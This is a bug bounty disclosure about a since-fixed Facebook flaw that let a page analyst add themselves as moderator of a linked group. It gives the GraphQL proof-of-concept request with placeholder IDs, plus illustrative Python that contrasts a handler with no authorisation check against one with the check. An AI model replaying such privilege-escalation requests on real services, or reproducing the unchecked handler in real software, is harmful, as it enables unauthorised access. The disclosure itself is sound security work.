Facebook Page Analyst Could Add Oneself as Moderator on Group

11 Jan 2019 - onehackzero

Description

   There is a call to add a member as a moderator on a group. At the time, the call didn't seem to have any authorisation checks against page roles, so a page analyst could add oneself as a moderator on a linked group.

Proof of Concept

HTTP POST

graph.facebook.com/graphql/

query_id=QUERYID

query_params={"0":{"user_id":"UserID","admin_type":"MODERATOR","actor_id":"PageID","client_mutation_id":"","source":"treehouse_group_mall","group_id":"GroupID"}}
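
The missing check described above, as an added example that is not part of the original report and is not Facebook's code: a hypothetical server-side handler for this mutation, first trusting the request as sent, then deriving authorisation from the authenticated session. The Store class, the function names, the ADMIN values and the rule that only a page ADMIN may change a linked group's moderators are assumptions.

```python
# Added example: hypothetical server-side handler, not Facebook's code.
from dataclasses import dataclass, field

# Assumption: only these page roles may change admin roles on a linked group.
ROLES_ALLOWED_TO_MANAGE_GROUP = {"ADMIN"}
# Assumption: only MODERATOR appears in the report; ADMIN is added for illustration.
VALID_ADMIN_TYPES = {"ADMIN", "MODERATOR"}


class Forbidden(Exception):
    """Raised when the authenticated caller may not perform the mutation."""


@dataclass
class Store:
    page_roles: dict = field(default_factory=dict)     # page_id -> {user_id: page role}
    linked_groups: dict = field(default_factory=dict)  # page_id -> {group_id, ...}
    group_admins: dict = field(default_factory=dict)   # group_id -> {user_id: admin_type}


def add_group_admin_unchecked(store, session_user, p):
    """Behaviour described in the report: no check of the caller's page role."""
    store.group_admins.setdefault(p["group_id"], {})[p["user_id"]] = p["admin_type"]


def add_group_admin(store, session_user, p):
    """Same mutation, authorised from server-side state for the session user."""
    page_id, group_id = p["actor_id"], p["group_id"]
    # 1. The caller's role on the acting page comes from the store, never the request.
    role = store.page_roles.get(page_id, {}).get(session_user)
    if role not in ROLES_ALLOWED_TO_MANAGE_GROUP:
        raise Forbidden(f"page role {role!r} may not manage group admins")
    # 2. A page may only act on groups that are linked to it.
    if group_id not in store.linked_groups.get(page_id, set()):
        raise Forbidden("group is not linked to the acting page")
    if p["admin_type"] not in VALID_ADMIN_TYPES:
        raise Forbidden("unknown admin_type")
    store.group_admins.setdefault(group_id, {})[p["user_id"]] = p["admin_type"]


def sample_store():
    # Constructed sample data: alice administers the page, bob is an analyst.
    return Store(
        page_roles={"page1": {"alice": "ADMIN", "bob": "ANALYST"}},
        linked_groups={"page1": {"group1"}},
    )
```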

Timeline

  • Dec 19, 2018 - Report Sent
  • Dec 22, 2018 - Further investigation by Facebook
  • Jan 9, 2019 - Fixed by Facebook
  • Jan 11, 2019 - Bounty Awarded by Facebook

Original link: www.symbo1.com